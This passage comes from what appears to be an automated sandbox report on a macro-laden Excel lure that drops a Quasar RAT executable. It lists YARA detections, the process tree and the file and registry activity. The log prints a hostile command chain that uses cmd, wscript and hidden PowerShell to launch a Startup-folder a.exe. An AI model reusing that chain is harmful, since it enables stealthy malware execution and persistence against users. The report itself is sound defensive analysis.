                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_054121F8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_054152E8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_05411928
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0541A710
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0541A6FF
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_054115E0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0690BFD6
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06907994
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E04F4F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E03F58
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E01B88
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BDD250
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DC154
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DE589
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DE598
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_01560740
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_0156579D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_015604D8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_015604C9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_01560730
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, VBA macros: true
                  Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.csCryptographic APIs: 'CreateDecryptor'
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeMutant created: \Sessions\1\BaseNamedObjects\Kdjaq
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.datJump to behavior
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, Workbook stream: true
                  Source: C:\ProgramData\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\ProgramData\a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\ProgramData\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\ProgramData\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
                  Source: C:\ProgramData\a.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\ProgramData\a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\ProgramData\a.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

                  Data Obfuscation: